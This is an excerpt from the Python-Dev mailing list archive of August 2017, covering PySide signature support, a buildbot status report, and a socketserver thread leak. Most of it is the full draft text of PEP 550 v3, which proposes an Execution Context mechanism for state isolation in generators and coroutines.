In-Reply-To: References: Message-ID: On Fri, 18 Aug 2017 at 02:05 Christian Tismer wrote: > Hi friends, > > in the last months, I have developed signature support for > PySide. The module creates the same signatures as are known > for plain Python functions. > > As a non-trivial addition, the module also handles multiple > signatures as a list. I consider this extension to PySide > as quite essential and actually more important as for Python > itself, because type info is rather crucial for PySide. > > Initially, I wrote this as a pure Python 3 extension. > Then I was "asked" to port this to Python 2 too, which was > quite hairy to do. I'm not sure if I should have done that. > > Before I publish this module, I want to ask: > -------------------------------------------- > > Is it a bad idea to support signatures in Python 2 as well? > Do I introduce a feature that should not exist in Python 2? > Or is it fine to do so? > > Please let me know your opinion, I am happy with any result. > If you're getting paid to do the port then I don't think it really hurts anything since it isn't going to magically open Python 2 to more usage. In fact, if you are filling in the annotation information so that type hints are being exposed then maybe there's a chance it might help someone port to Python 3? -------------- next part -------------- An HTML attachment was scrubbed... URL: From victor.stinner at gmail.com Fri Aug 18 12:36:53 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Fri, 18 Aug 2017 18:36:53 +0200 Subject: [Python-Dev] Buildbot report, August 2017 Message-ID: Hi, Here is a quick report of what changed recently on buildbots. == pythoninfo == I added a new "python3 -m test.pythoninfo" command which is now run on Travis CI, AppVeyor and buildbots. https://bugs.python.org/issue30871 This command dumps various informations to help debugging test failures on our CIs. For example, you get the Tcl version, information about the threading implementation, etc. Currently, pythoninfo is only run on the master branch, but I plan to run it on Python 3.6 and 2.7 later. The pythoninfo idea comes from https://bugs.python.org/issue29854 when we didn't know the readline version of a buildbot, and I didn't want to put such information in regrtest header, since importing readline has side effects. == Removed buildbots == A few buildbots were removed: * All Python 3.5 buildbots was removed, since the 3.5 branch entered the security only stage: https://mail.python.org/pipermail/python-dev/2017-August/148794.html * FreeBSD 9-STABLE (koobs-freebsd9): FreeBSD 9 is no more supported upstream, use FreeBSD 10 and FreeBSD CURRENT buildbots * OpenIndiana: was offline since the beginning of June. Previous discussions on this list: * September 2016: OpenIndiana and Solaris support https://mail.python.org/pipermail/python-dev/2016-September/146538.html * April 2015: MemoryError and other bugs on AMD64 OpenIndiana 3.x https://mail.python.org/pipermail/python-dev/2015-April/138967.html * September 2014: Sad status of Python 3.x buildbots https://mail.python.org/pipermail/python-dev/2014-September/136175.html * intel-ubuntu-skylake: Florin Papa wrote me that the machine became unavailable in December 2016. * Yosemite ICC buildbot (intel-yosemite-icc): it was maintained by Zachary Ware and R. David Murray. Sadly, David lost the VM image to a disk crash :-( New ICC buildbots may come back later, wait & see ;-) * macOS Snow Leopard (murray-snowleopard): this old machine was stuck at boot for an unknown reason. "It's an old machine, and it is probably time to get rid of it." wrote R. David Murray :-) == Reduced failure rate == As usual, many race conditions were fixed in tests and in the code, to reduce the buildbot failure rate. I may list them in a blog post, later. == What's Next? == * Buildbot should be upgrade to buildbot 0.9: https://github.com/python/buildmaster-config/pull/12 * Zachary Ware plans to rewrite our buildbot configuration during the CPython sprint (Sept 4-9) * test_logging fails randomly on FreeBSD 10 with a warning related to threads (bpo-30830). I was trying to reproduce the bug since 2 months. I just identified to root bug! https://bugs.python.org/issue31233 "socketserver.ThreadingMixIn leaks running threads after server_close()". * The "Docs" buildbot (currently offline) may be dropped as well, https://github.com/python/buildmaster-config/pull/21 See also my previous buildbot report: https://haypo.github.io/python-buildbots-2017q2.html Victor From victor.stinner at gmail.com Fri Aug 18 12:40:00 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Fri, 18 Aug 2017 18:40:00 +0200 Subject: [Python-Dev] socketserver ForkingMixin waiting for child processes In-Reply-To: References: Message-ID: 2017-08-12 0:34 GMT+02:00 Ryan Smith-Roberts : > Since ThreadingMixIn also leaks threads, > server_close() could grow a timeout flag (following the socket module > timeout convention) and maybe a terminate boolean. ThreadingMixIn could then > also be fixed. I'm not sure how useful that is though, since I'd bet almost > all users of socketserver exit the process shortly after server_close(). > Plus it can't be backported to the feature-freeze branches. Oh. It took me 2 months, but I finally identified why *sometimes*, test_logging fails with warning about threads. It's exactly because of the weak socketserver.ThreadingMixIn which leaves running threads in the background, even after server_close(). I just opened a new issue: "socketserver.ThreadingMixIn leaks running threads after server_close()" https://bugs.python.org/issue31233 Victor From jelle.zijlstra at gmail.com Fri Aug 18 12:55:26 2017 From: jelle.zijlstra at gmail.com (Jelle Zijlstra) Date: Fri, 18 Aug 2017 18:55:26 +0200 Subject: [Python-Dev] __signature__ for PySide ready In-Reply-To: References: Message-ID: 2017-08-18 18:20 GMT+02:00 Yury Selivanov : > Hi Christian, > > On Fri, Aug 18, 2017 at 4:41 AM, Christian Tismer > wrote: > > Hi friends, > > > > in the last months, I have developed signature support for > > PySide. The module creates the same signatures as are known > > for plain Python functions. > > > > As a non-trivial addition, the module also handles multiple > > signatures as a list. I consider this extension to PySide > > as quite essential and actually more important as for Python > > itself, because type info is rather crucial for PySide. > > > > Initially, I wrote this as a pure Python 3 extension. > > Then I was "asked" to port this to Python 2 too, which was > > quite hairy to do. I'm not sure if I should have done that. > > > > Before I publish this module, I want to ask: > > -------------------------------------------- > > > > Is it a bad idea to support signatures in Python 2 as well? > > There's a backport of signature API to Python 2. Although last time I > checked it was fairly outdated. > > I wrote a backport earlier this year: https://pypi.python.org/pypi/inspect2. > > Do I introduce a feature that should not exist in Python 2? > > Or is it fine to do so? > > > > Please let me know your opinion, I am happy with any result. > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > jelle.zijlstra%40gmail.com > -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Fri Aug 18 16:33:27 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Fri, 18 Aug 2017 16:33:27 -0400 Subject: [Python-Dev] PEP 550 v3 Message-ID: Hi, This is a third iteration of the PEP. There was some really good feedback on python-ideas and the discussion thread became hard to follow again, so I decided to update the PEP only three days after I published the previous version. Summary of the changes can be found in the "Version History" section: https://www.python.org/dev/peps/pep-0550/#version-history There are a few open questions left, namely the terminology and design of ContextKey API. On the former topic, I'm quite happy with the latest version: Execution Context, Logical Context, and Context Key. Thank you, Yury PEP: 550 Title: Execution Context Version: $Revision$ Last-Modified: $Date$ Author: Yury Selivanov Status: Draft Type: Standards Track Content-Type: text/x-rst Created: 11-Aug-2017 Python-Version: 3.7 Post-History: 11-Aug-2017, 15-Aug-2017, 18-Aug-2017 Abstract ======== This PEP proposes a new mechanism to manage execution state--the logical environment in which a function, a thread, a generator, or a coroutine executes in. A few examples of where having a reliable state storage is required: * Context managers like decimal contexts, ``numpy.errstate``, and ``warnings.catch_warnings``; * Storing request-related data such as security tokens and request data in web applications, implementing i18n; * Profiling, tracing, and logging in complex and large code bases. The usual solution for storing state is to use a Thread-local Storage (TLS), implemented in the standard library as ``threading.local()``. Unfortunately, TLS does not work for the purpose of state isolation for generators or asynchronous code, because such code executes concurrently in a single thread. Rationale ========= Traditionally, a Thread-local Storage (TLS) is used for storing the state. However, the major flaw of using the TLS is that it works only for multi-threaded code. It is not possible to reliably contain the state within a generator or a coroutine. For example, consider the following generator:: def calculate(precision, ...): with decimal.localcontext() as ctx: # Set the precision for decimal calculations # inside this block ctx.prec = precision yield calculate_something() yield calculate_something_else() Decimal context is using a TLS to store the state, and because TLS is not aware of generators, the state can leak. If a user iterates over the ``calculate()`` generator with different precisions one by one using a ``zip()`` built-in, the above code will not work correctly. For example:: g1 = calculate(precision=100) g2 = calculate(precision=50) items = list(zip(g1, g2)) # items[0] will be a tuple of: # first value from g1 calculated with 100 precision, # first value from g2 calculated with 50 precision. # # items[1] will be a tuple of: # second value from g1 calculated with 50 precision (!!!), # second value from g2 calculated with 50 precision. An even scarier example would be using decimals to represent money in an async/await application: decimal calculations can suddenly lose precision in the middle of processing a request. Currently, bugs like this are extremely hard to find and fix. Another common need for web applications is to have access to the current request object, or security context, or, simply, the request URL for logging or submitting performance tracing data:: async def handle_http_request(request): context.current_http_request = request await ... # Invoke your framework code, render templates, # make DB queries, etc, and use the global # 'current_http_request' in that code. # This isn't currently possible to do reliably # in asyncio out of the box. These examples are just a few out of many, where a reliable way to store context data is absolutely needed. The inability to use TLS for asynchronous code has lead to proliferation of ad-hoc solutions, which are limited in scope and do not support all required use cases. Current status quo is that any library, including the standard library, that uses a TLS, will likely not work as expected in asynchronous code or with generators (see [3]_ as an example issue.) Some languages that have coroutines or generators recommend to manually pass a ``context`` object to every function, see [1]_ describing the pattern for Go. This approach, however, has limited use for Python, where we have a huge ecosystem that was built to work with a TLS-like context. Moreover, passing the context explicitly does not work at all for libraries like ``decimal`` or ``numpy``, which use operator overloading. .NET runtime, which has support for async/await, has a generic solution of this problem, called ``ExecutionContext`` (see [2]_). On the surface, working with it is very similar to working with a TLS, but the former explicitly supports asynchronous code. Goals ===== The goal of this PEP is to provide a more reliable alternative to ``threading.local()``. It should be explicitly designed to work with Python execution model, equally supporting threads, generators, and coroutines. An acceptable solution for Python should meet the following requirements: * Transparent support for code executing in threads, coroutines, and generators with an easy to use API. * Negligible impact on the performance of the existing code or the code that will be using the new mechanism. * Fast C API for packages like ``decimal`` and ``numpy``. Explicit is still better than implicit, hence the new APIs should only be used when there is no acceptable way of passing the state explicitly. Specification ============= Execution Context is a mechanism of storing and accessing data specific to a logical thread of execution. We consider OS threads, generators, and chains of coroutines (such as ``asyncio.Task``) to be variants of a logical thread. In this specification, we will use the following terminology: * **Logical Context**, or LC, is a key/value mapping that stores the context of a logical thread. * **Execution Context**, or EC, is an OS-thread-specific dynamic stack of Logical Contexts. * **Context Key**, or CK, is an object used to set and get values from the Execution Context. Please note that throughout the specification we use simple pseudo-code to illustrate how the EC machinery works. The actual algorithms and data structures that we will use to implement the PEP are discussed in the `Implementation Strategy`_ section. Context Key Object ------------------ The ``sys.new_context_key(name)`` function creates a new ``ContextKey`` object. The ``name`` parameter is a ``str`` needed to render a representation of ``ContextKey`` object for introspection and debugging purposes. ``ContextKey`` objects have the following methods and attributes: * ``.name``: read-only name; * ``.set(o)`` method: set the value to ``o`` for the context key in the execution context. * ``.get()`` method: return the current EC value for the context key. Context keys return ``None`` when the key is missing, so the method never fails. The below is an example of how context keys can be used:: my_context = sys.new_context_key('my_context') my_context.set('spam') # Later, to access the value of my_context: print(my_context.get()) Thread State and Multi-threaded code ------------------------------------ Execution Context is implemented on top of Thread-local Storage. For every thread there is a separate stack of Logical Contexts -- mappings of ``ContextKey`` objects to their values in the LC. New threads always start with an empty EC. For CPython:: PyThreadState: execution_context: ExecutionContext([ LogicalContext({ci1: val1, ci2: val2, ...}), ... ]) The ``ContextKey.get()`` and ``.set()`` methods are defined as follows (in pseudo-code):: class ContextKey: def get(self): tstate = PyThreadState_Get() for logical_context in reversed(tstate.execution_context): if self in logical_context: return logical_context[self] return None def set(self, value): tstate = PyThreadState_Get() if not tstate.execution_context: tstate.execution_context = [LogicalContext()] tstate.execution_context[-1][self] = value With the semantics defined so far, the Execution Context can already be used as an alternative to ``threading.local()``:: def print_foo(): print(ci.get() or 'nothing') ci = sys.new_context_key('ci') ci.set('foo') # Will print "foo": print_foo() # Will print "nothing": threading.Thread(target=print_foo).start() Manual Context Management ------------------------- Execution Context is generally managed by the Python interpreter, but sometimes it is desirable for the user to take the control over it. A few examples when this is needed: * running a computation in ``concurrent.futures.ThreadPoolExecutor`` with the current EC; * reimplementing generators with iterators (more on that later); * managing contexts in asynchronous frameworks (implement proper EC support in ``asyncio.Task`` and ``asyncio.loop.call_soon``.) For these purposes we add a set of new APIs (they will be used in later sections of this specification): * ``sys.new_logical_context()``: create an empty ``LogicalContext`` object. * ``sys.new_execution_context()``: create an empty ``ExecutionContext`` object. * Both ``LogicalContext`` and ``ExecutionContext`` objects are opaque to Python code, and there are no APIs to modify them. * ``sys.get_execution_context()`` function. The function returns a copy of the current EC: an ``ExecutionContext`` instance. The runtime complexity of the actual implementation of this function can be O(1), but for the purposes of this section it is equivalent to:: def get_execution_context(): tstate = PyThreadState_Get() return copy(tstate.execution_context) * ``sys.run_with_execution_context(ec: ExecutionContext, func, *args, **kwargs)`` runs ``func(*args, **kwargs)`` in the provided execution context:: def run_with_execution_context(ec, func, *args, **kwargs): tstate = PyThreadState_Get() old_ec = tstate.execution_context tstate.execution_context = ExecutionContext( ec.logical_contexts + [LogicalContext()] ) try: return func(*args, **kwargs) finally: tstate.execution_context = old_ec Any changes to Logical Context by ``func`` will be ignored. This allows to reuse one ``ExecutionContext`` object for multiple invocations of different functions, without them being able to affect each other's environment:: ci = sys.new_context_key('ci') ci.set('spam') def func(): print(ci.get()) ci.set('ham') ec = sys.get_execution_context() sys.run_with_execution_context(ec, func) sys.run_with_execution_context(ec, func) # Will print: # spam # spam * ``sys.run_with_logical_context(lc: LogicalContext, func, *args, **kwargs)`` runs ``func(*args, **kwargs)`` in the current execution context using the specified logical context. Any changes that ``func`` does to the logical context will be persisted in ``lc``. This behaviour is different from the ``run_with_execution_context()`` function, which always creates a new throw-away logical context. In pseudo-code:: def run_with_logical_context(lc, func, *args, **kwargs): tstate = PyThreadState_Get() old_ec = tstate.execution_context tstate.execution_context = ExecutionContext( old_ec.logical_contexts + [lc] ) try: return func(*args, **kwargs) finally: tstate.execution_context = old_ec Using the previous example:: ci = sys.new_context_key('ci') ci.set('spam') def func(): print(ci.get()) ci.set('ham') ec = sys.get_execution_context() lc = sys.new_logical_context() sys.run_with_logical_context(lc, func) sys.run_with_logical_context(lc, func) # Will print: # spam # ham As an example, let's make a subclass of ``concurrent.futures.ThreadPoolExecutor`` that preserves the execution context for scheduled functions:: class Executor(concurrent.futures.ThreadPoolExecutor): def submit(self, fn, *args, **kwargs): context = sys.get_execution_context() fn = functools.partial( sys.run_with_execution_context, context, fn, *args, **kwargs) return super().submit(fn) Generators ---------- Generators in Python are producers of data, and ``yield`` expressions are used to suspend/resume their execution. When generators suspend execution, their local state will "leak" to the outside code if they store it in a TLS or in a global variable:: local = threading.local() def gen(): old_x = local.x local.x = 'spam' try: yield ... yield finally: local.x = old_x The above code will not work as many Python users expect it to work. A simple ``next(gen())`` will set ``local.x`` to "spam" and it will never be reset back to its original value. One of the goals of this proposal is to provide a mechanism to isolate local state in generators. Generator Object Modifications ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ To achieve this, we make a small set of modifications to the generator object: * New ``__logical_context__`` attribute. This attribute is readable and writable for Python code. * When a generator object is instantiated its ``__logical_context__`` is initialized with an empty ``LogicalContext``. * Generator's ``.send()`` and ``.throw()`` methods are modified as follows (in pseudo-C):: if gen.__logical_context__ is not NULL: tstate = PyThreadState_Get() tstate.execution_context.push(gen.__logical_context__) try: # Perform the actual `Generator.send()` or # `Generator.throw()` call. return gen.send(...) finally: gen.__logical_context__ = tstate.execution_context.pop() else: # Perform the actual `Generator.send()` or # `Generator.throw()` call. return gen.send(...) If a generator has a non-NULL ``__logical_context__``, it will be pushed to the EC and, therefore, generators will use it to accumulate their local state. If a generator has no ``__logical_context__``, generators will will use whatever LC they are being run in. EC Semantics for Generators ^^^^^^^^^^^^^^^^^^^^^^^^^^^ Every generator object has its own Logical Context that stores only its own local modifications of the context. When a generator is being iterated, its logical context will be put in the EC stack of the current thread. This means that the generator will be able to access keys from the surrounding context:: local = sys.new_context_key("local") global = sys.new_context_key("global") def generator(): local.set('inside gen:') while True: print(local.get(), global.get()) yield g = gen() local.set('hello') global.set('spam') next(g) local.set('world') global.set('ham') next(g) # Will print: # inside gen: spam # inside gen: ham Any changes to the EC in nested generators are invisible to the outer generator:: local = sys.new_context_key("local") def inner_gen(): local.set('spam') yield def outer_gen(): local.set('ham') yield from gen() print(local.get()) list(outer_gen()) # Will print: # ham Running generators without LC ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ If ``__logical_context__`` is set to ``None`` for a generator, it will simply use the outer Logical Context. The ``@contextlib.contextmanager`` decorator uses this mechanism to allow its generator to affect the EC:: item = sys.new_context_key('item') @contextmanager def context(x): old = item.get() item.set('x') try: yield finally: item.set(old) with context('spam'): with context('ham'): print(1, item.get()) print(2, item.get()) # Will print: # 1 ham # 2 spam Implementing Generators with Iterators ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ The Execution Context API allows to fully replicate EC behaviour imposed on generators with a regular Python iterator class:: class Gen: def __init__(self): self.logical_context = sys.new_logical_context() def __iter__(self): return self def __next__(self): return sys.run_with_logical_context( self.logical_context, self._next_impl) def _next_impl(self): # Actual __next__ implementation. ... yield from in generator-based coroutines ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Prior to :pep:`492`, ``yield from`` was used as one of the mechanisms to implement coroutines in Python. :pep:`492` is built on top of ``yield from`` machinery, and it is even possible to make a generator compatible with async/await code by decorating it with ``@types.coroutine`` (or ``@asyncio.coroutine``). Generators decorated with these decorators follow the Execution Context semantics described below in the `EC Semantics for Coroutines`_ section below. yield from in generators ^^^^^^^^^^^^^^^^^^^^^^^^ Another ``yield from`` use is to compose generators. Essentially, ``yield from gen()`` is a better version of ``for v in gen(): yield v`` (read more about many subtle details in :pep:`380`.) A crucial difference between ``await coro`` and ``yield value`` is that the former expression guarantees that the ``coro`` will be executed fully, while the latter is producing ``value`` and suspending the generator until it gets iterated again. Therefore, this proposal does not special case ``yield from`` expression for regular generators:: item = sys.new_context_key('item') def nested(): assert item.get() == 'outer' item.set('inner') yield def outer(): item.set('outer') yield from nested() assert item.get() == 'outer' EC Semantics for Coroutines --------------------------- Python :pep:`492` coroutines are used to implement cooperative multitasking. For a Python end-user they are similar to threads, especially when it comes to sharing resources or modifying the global state. An event loop is needed to schedule coroutines. Coroutines that are explicitly scheduled by the user are usually called Tasks. When a coroutine is scheduled, it can schedule other coroutines using an ``await`` expression. In async/await world, awaiting a coroutine is equivalent to a regular function call in synchronous code. Thus, Tasks are similar to threads. By drawing a parallel between regular multithreaded code and async/await, it becomes apparent that any modification of the execution context within one Task should be visible to all coroutines scheduled within it. Any execution context modifications, however, must not be visible to other Tasks executing within the same OS thread. Similar to generators, coroutines have the new ``__logical_context__`` attribute and same implementations of ``.send()`` and ``.throw()`` methods. The key difference is that coroutines start with ``__logical_context__`` set to ``NULL`` (generators start with an empty ``LogicalContext``.) This means that it is expected that the asynchronous library and its Task abstraction will control how exactly coroutines interact with Execution Context. Tasks ^^^^^ In asynchronous frameworks like asyncio, coroutines are run by an event loop, and need to be explicitly scheduled (in asyncio coroutines are run by ``asyncio.Task``.) To enable correct Execution Context propagation into Tasks, the asynchronous framework needs to assist the interpreter: * When ``create_task`` is called, it should capture the current execution context with ``sys.get_execution_context()`` and save it on the Task object. * The ``__logical_context__`` of the wrapped coroutine should be initialized to a new empty logical context. * When the Task object runs its coroutine object, it should execute ``.send()`` and ``.throw()`` methods within the captured execution context, using the ``sys.run_with_execution_context()`` function. For ``asyncio.Task``:: class Task: def __init__(self, coro): ... self.exec_context = sys.get_execution_context() coro.__logical_context__ = sys.new_logical_context() def _step(self, val): ... sys.run_with_execution_context( self.exec_context, self.coro.send, val) ... This makes any changes to execution context made by nested coroutine calls within a Task to be visible throughout the Task:: ci = sys.new_context_key('ci') async def nested(): ci.set('nested') async def main(): ci.set('main') print('before:', ci.get()) await nested() print('after:', ci.get()) asyncio.get_event_loop().run_until_complete(main()) # Will print: # before: main # after: nested New Tasks, started within another Task, will run in the correct execution context too:: current_request = sys.new_context_key('current_request') async def child(): print('current request:', repr(current_request.get())) async def handle_request(request): current_request.set(request) event_loop.create_task(child) run(top_coro()) # Will print: # current_request: None The above snippet will run correctly, and the ``child()`` coroutine will be able to access the current request object through the ``current_request`` Context Key. Any of the above examples would work if one the coroutines was a generator decorated with ``@asyncio.coroutine``. Event Loop Callbacks ^^^^^^^^^^^^^^^^^^^^ Similarly to Tasks, functions like asyncio's ``loop.call_soon()`` should capture the current execution context with ``sys.get_execution_context()`` and execute callbacks within it with ``sys.run_with_execution_context()``. This way the following code will work:: current_request = sys.new_context_key('current_request') def log(): request = current_request.get() print(request) async def request_handler(request): current_request.set(request) get_event_loop.call_soon(log) Asynchronous Generators ----------------------- Asynchronous Generators (AG) interact with the Execution Context similarly to regular generators. They have an ``__logical_context__`` attribute, which, similarly to regular generators, can be set to ``None`` to make them use the outer Logical Context. This is used by the new ``contextlib.asynccontextmanager`` decorator. Greenlets --------- Greenlet is an alternative implementation of cooperative scheduling for Python. Although greenlet package is not part of CPython, popular frameworks like gevent rely on it, and it is important that greenlet can be modified to support execution contexts. In a nutshell, greenlet design is very similar to design of generators. The main difference is that for generators, the stack is managed by the Python interpreter. Greenlet works outside of the Python interpreter, and manually saves some ``PyThreadState`` fields and pushes/pops the C-stack. Thus the ``greenlet`` package can be easily updated to use the new low-level `C API`_ to enable full support of EC. New APIs ======== Python ------ Python APIs were designed to completely hide the internal implementation details, but at the same time provide enough control over EC and LC to re-implement all of Python built-in objects in pure Python. 1. ``sys.new_context_key(name: str='...')``: create a ``ContextKey`` object used to access/set values in EC. 2. ``ContextKey``: * ``.name``: read-only attribute. * ``.get()``: return the current value for the key. * ``.set(o)``: set the current value in the EC for the key. 3. ``sys.get_execution_context()``: return the current ``ExecutionContext``. 4. ``sys.new_execution_context()``: create a new empty ``ExecutionContext``. 5. ``sys.new_logical_context()``: create a new empty ``LogicalContext``. 6. ``sys.run_with_execution_context(ec: ExecutionContext, func, *args, **kwargs)``. 7. ``sys.run_with_logical_context(lc:LogicalContext, func, *args, **kwargs)``. C API ----- 1. ``PyContextKey * PyContext_NewKey(char *desc)``: create a ``PyContextKey`` object. 2. ``PyObject * PyContext_GetKey(PyContextKey *)``: get the current value for the context key. 3. ``int PyContext_SetKey(PyContextKey *, PyObject *)``: set the current value for the context key. 4. ``PyLogicalContext * PyLogicalContext_New()``: create a new empty ``PyLogicalContext``. 5. ``PyLogicalContext * PyExecutionContext_New()``: create a new empty ``PyExecutionContext``. 6. ``PyExecutionContext * PyExecutionContext_Get()``: get the EC for the active thread state. 7. ``int PyExecutionContext_Set(PyExecutionContext *)``: set the passed EC object as the current for the active thread state. 8. ``int PyExecutionContext_SetWithLogicalContext(PyExecutionContext *, PyLogicalContext *)``: allows to implement ``sys.run_with_logical_context`` Python API. Implementation Strategy ======================= LogicalContext is a Weak Key Mapping ------------------------------------ Using a weak key mapping for ``LogicalContext`` implementation enables the following properties with regards to garbage collection: * ``ContextKey`` objects are strongly-referenced only from the application code, not from any of the Execution Context machinery or values they point to. This means that there are no reference cycles that could extend their lifespan longer than necessary, or prevent their garbage collection. * Values put in the Execution Context are guaranteed to be kept alive while there is a ``ContextKey`` key referencing them in the thread. * If a ``ContextKey`` is garbage collected, all of its values will be removed from all contexts, allowing them to be GCed if needed. * If a thread has ended its execution, its thread state will be cleaned up along with its ``ExecutionContext``, cleaning up all values bound to all Context Keys in the thread. ContextKey.get() Cache ---------------------- We can add three new fields to ``PyThreadState`` and ``PyInterpreterState`` structs: * ``uint64_t PyThreadState->unique_id``: a globally unique thread state identifier (we can add a counter to ``PyInterpreterState`` and increment it when a new thread state is created.) * ``uint64_t ContextKey->version``: every time the key is updated in any logical context or thread, this key will be incremented. The above two fields allow implementing a fast cache path in ``ContextKey.get()``, in pseudo-code:: class ContextKey: def set(self, value): ... # implementation self.version += 1 def get(self): tstate = PyThreadState_Get() if (self.last_tstate_id == tstate.unique_id and self.last_version == self.version): return self.last_value value = None for mapping in reversed(tstate.execution_context): if self in mapping: value = mapping[self] break self.last_value = value # borrowed ref self.last_tstate_id = tstate.unique_id self.last_version = self.version return value Note that ``last_value`` is a borrowed reference. The assumption is that if current thread and key version tests are OK, the object will be alive. This allows the CK values to be properly GCed. This is similar to the trick that decimal C implementation uses for caching the current decimal context, and will have the same performance characteristics, but available to all Execution Context users. Approach #1: Use a dict for LogicalContext ------------------------------------------ The straightforward way of implementing the proposed EC mechanisms is to create a ``WeakKeyDict`` on top of Python ``dict`` type. To implement the ``ExecutionContext`` type we can use Python ``list`` (or a custom stack implementation with some pre-allocation optimizations). This approach will have the following runtime complexity: * O(M) for ``ContextKey.get()``, where ``M`` is the number of Logical Contexts in the stack. It is important to note that ``ContextKey.get()`` will implement a cache making the operation O(1) for packages like ``decimal`` and ``numpy``. * O(1) for ``ContextKey.set()``. * O(N) for ``sys.get_execution_context()``, where ``N`` is the total number of keys/values in the current **execution** context. Approach #2: Use HAMT for LogicalContext ---------------------------------------- Languages like Clojure and Scala use Hash Array Mapped Tries (HAMT) to implement high performance immutable collections [5]_, [6]_. Immutable mappings implemented with HAMT have O(log\ :sub:`32`\ N) performance for both ``set()``, ``get()``, and ``merge()`` operations, which is essentially O(1) for relatively small mappings (read about HAMT performance in CPython in the `Appendix: HAMT Performance`_ section.) In this approach we use the same design of the ``ExecutionContext`` as in Approach #1, but we will use HAMT backed weak key Logical Context implementation. With that we will have the following runtime complexity: * O(M * log\ :sub:`32`\ N) for ``ContextKey.get()``, where ``M`` is the number of Logical Contexts in the stack, and ``N`` is the number of keys/values in the EC. The operation will essentially be O(M), because execution contexts are normally not expected to have more than a few dozen of keys/values. (``ContextKey.get()`` will have the same caching mechanism as in Approach #1.) * O(log\ :sub:`32`\ N) for ``ContextKey.set()`` where ``N`` is the number of keys/values in the current **logical** context. This will essentially be an O(1) operation most of the time. * O(log\ :sub:`32`\ N) for ``sys.get_execution_context()``, where ``N`` is the total number of keys/values in the current **execution** context. Essentially, using HAMT for Logical Contexts instead of Python dicts, allows to bring down the complexity of ``sys.get_execution_context()`` from O(N) to O(log\ :sub:`32`\ N) because of the more efficient merge algorithm. Approach #3: Use HAMT and Immutable Linked List ----------------------------------------------- We can make an alternative ``ExecutionContext`` design by using a linked list. Each ``LogicalContext`` in the ``ExecutionContext`` object will be wrapped in a linked-list node. ``LogicalContext`` objects will use an HAMT backed weak key implementation described in the Approach #2. Every modification to the current ``LogicalContext`` will produce a new version of it, which will be wrapped in a **new linked list node**. Essentially this means, that ``ExecutionContext`` is an immutable forest of ``LogicalContext`` objects, and can be safely copied by reference in ``sys.get_execution_context()`` (eliminating the expensive "merge" operation.) With this approach, ``sys.get_execution_context()`` will be a constant time **O(1) operation**. In case we decide to apply additional optimizations such as flattening ECs with too many Logical Contexts, HAMT-backed immutable mapping will have a O(log\ :sub:`32`\ N) merge complexity. Summary ------- We believe that approach #3 enables an efficient and complete Execution Context implementation, with excellent runtime performance. `ContextKey.get() Cache`_ enables fast retrieval of context keys for performance critical libraries like decimal and numpy. Fast ``sys.get_execution_context()`` enables efficient management of execution contexts in asynchronous libraries like asyncio. Design Considerations ===================== Can we fix ``PyThreadState_GetDict()``? --------------------------------------- ``PyThreadState_GetDict`` is a TLS, and some of its existing users might depend on it being just a TLS. Changing its behaviour to follow the Execution Context semantics would break backwards compatibility. PEP 521 ------- :pep:`521` proposes an alternative solution to the problem: enhance Context Manager Protocol with two new methods: ``__suspend__`` and ``__resume__``. To make it compatible with async/await, the Asynchronous Context Manager Protocol will also need to be extended with ``__asuspend__`` and ``__aresume__``. This allows to implement context managers like decimal context and ``numpy.errstate`` for generators and coroutines. The following code:: class Context: def __init__(self): self.key = new_context_key('key') def __enter__(self): self.old_x = self.key.get() self.key.set('something') def __exit__(self, *err): self.key.set(self.old_x) would become this:: local = threading.local() class Context: def __enter__(self): self.old_x = getattr(local, 'x', None) local.x = 'something' def __suspend__(self): local.x = self.old_x def __resume__(self): local.x = 'something' def __exit__(self, *err): local.x = self.old_x Besides complicating the protocol, the implementation will likely negatively impact performance of coroutines, generators, and any code that uses context managers, and will notably complicate the interpreter implementation. :pep:`521` also does not provide any mechanism to propagate state in a logical context, like storing a request object in an HTTP request handler to have better logging. Nor does it solve the leaking state problem for greenlet/gevent. Can Execution Context be implemented outside of CPython? -------------------------------------------------------- Because async/await code needs an event loop to run it, an EC-like solution can be implemented in a limited way for coroutines. Generators, on the other hand, do not have an event loop or trampoline, making it impossible to intercept their ``yield`` points outside of the Python interpreter. Should we update sys.displayhook and other APIs to use EC? ---------------------------------------------------------- APIs like redirecting stdout by overwriting ``sys.stdout``, or specifying new exception display hooks by overwriting the ``sys.displayhook`` function are affecting the whole Python process **by design**. Their users assume that the effect of changing them will be visible across OS threads. Therefore we cannot just make these APIs to use the new Execution Context. That said we think it is possible to design new APIs that will be context aware, but that is outside of the scope of this PEP. Backwards Compatibility ======================= This proposal preserves 100% backwards compatibility. Appendix: HAMT Performance ========================== While investigating possibilities of how to implement an immutable mapping in CPython, we were able to improve the efficiency of ``dict.copy()`` up to 5 times: [4]_. One caveat is that the improved ``dict.copy()`` does not resize the dict, which is a necessary thing to do when items get deleted from the dict. Which means that we can make ``dict.copy()`` faster for only dicts that don't need to be resized, and the ones that do, will use a slower version. To assess if HAMT can be used for Execution Context, we implemented it in CPython [7]_. .. figure:: pep-0550-hamt_vs_dict.png :align: center :width: 100% Figure 1. Benchmark code can be found here: [9]_. The chart illustrates the following: * HAMT displays near O(1) performance for all benchmarked dictionary sizes. * If we can use the optimized ``dict.copy()`` implementation ([4]_), the performance of immutable mapping implemented with Python ``dict`` is good up until 100 items. * A dict with an unoptimized ``dict.copy()`` becomes very slow around 100 items. .. figure:: pep-0550-lookup_hamt.png :align: center :width: 100% Figure 2. Benchmark code can be found here: [10]_. Figure 2 shows comparison of lookup costs between Python dict and an HAMT immutable mapping. HAMT lookup time is 30-40% worse than Python dict lookups on average, which is a very good result, considering how well Python dicts are optimized. Note, that according to [8]_, HAMT design can be further improved. The bottom line is that it is possible to imagine a scenario when an application has more than 100 items in the Execution Context, in which case the dict-backed implementation of an immutable mapping becomes a subpar choice. HAMT on the other hand guarantees that its ``set()``, ``get()``, and ``merge()`` operations will execute in O(log\ :sub:`32`\ ) time, which means it is a more future proof solution. Acknowledgments =============== I 